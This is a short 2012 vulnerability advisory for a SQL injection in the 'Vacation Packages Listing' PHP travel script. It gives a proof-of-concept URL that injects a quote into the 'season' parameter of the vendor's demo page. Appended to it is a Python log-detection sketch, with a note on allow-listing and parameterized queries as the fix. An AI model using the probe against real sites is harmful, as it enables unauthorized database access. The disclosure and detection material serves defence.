Vacation Packages Listing SQL Injection

2012.03.21
Credit: r45c4l
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: VACATION PACKAGES LISTING Sql Injection
# Date: 19/03/2012
# Author: r45c4l
# Script url: http://www.classifiedsgeek.com/vacation-packages/
# Version: N/A
# CVE : ()

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Product Description :
Vacation packages listing is a PHP travel script & travel deals software for travel agencies and tour operators to manage dynamic vacation packages and travel deals.

Product Cost : $119.00

===============================Exploit=================================================

---ICW---

[ EXPL0!T ]

SQL Injection

Note: Tested on demo site

p0c - http://www.classifiedsgeek.com/vacation-packages/demo.php?controller=Listings&action=search&listing_search=1&season=2'

===========================================================================

Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0, Hoody, sam, Sai Satish
All members of ICW, AH, G4H and darkc0de and all Indian Hackers
Special Greetz to : b4ltazar and s1nn3r

# Email: infosecpirate@gmail.com

=== End () ====

References:

http://www.classifiedsgeek.com/vacation-packages/
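
Detection sketch for the request shape in the advisory, added here as an example and not part of the original advisory or the vendor's code. It assumes combined-format web access logs and that a legitimate `season` value is a short unsigned integer; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Mar/2012:10:01:02 +0000] "GET /vacation-packages/demo.php?controller=Listings&action=search&listing_search=1&season=2 HTTP/1.1" 200 5120
203.0.113.9 - - [21/Mar/2012:10:01:07 +0000] "GET /vacation-packages/demo.php?controller=Listings&action=search&listing_search=1&season=2%27 HTTP/1.1" 200 812
198.51.100.7 - - [21/Mar/2012:10:02:11 +0000] "GET /vacation-packages/demo.php?controller=Listings&action=search&listing_search=1&season= HTTP/1.1" 200 5003
198.51.100.7 - - [21/Mar/2012:10:02:15 +0000] "GET /vacation-packages/demo.php?controller=Pages&action=about HTTP/1.1" 200 2040
"""

# client IP, timestamp and request target from one combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*"')
# Assumption: a legitimate season value is a short unsigned integer (or empty).
VALID_SEASON = re.compile(r"\d{1,4}")


def suspicious_season_requests(log_text):
    """Return (client_ip, timestamp, decoded_value) for every Listings search
    request whose season parameter is present but not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable GET/POST request line
        ip, ts, target = m.groups()
        # parse_qs percent-decodes values, so %27 is compared as a quote
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if query.get("controller") != ["Listings"] or query.get("action") != ["search"]:
            continue  # only the search action named in the advisory
        for value in query.get("season", []):
            if value and not VALID_SEASON.fullmatch(value):
                hits.append((ip, ts, value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in suspicious_season_requests(SAMPLE_LOG):
        print(f"{ts} {ip} season={value!r}")
```

The same allow-list check (integer only) applied server-side before the value reaches the query, together with a parameterized statement, is the corresponding fix for CWE-89.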

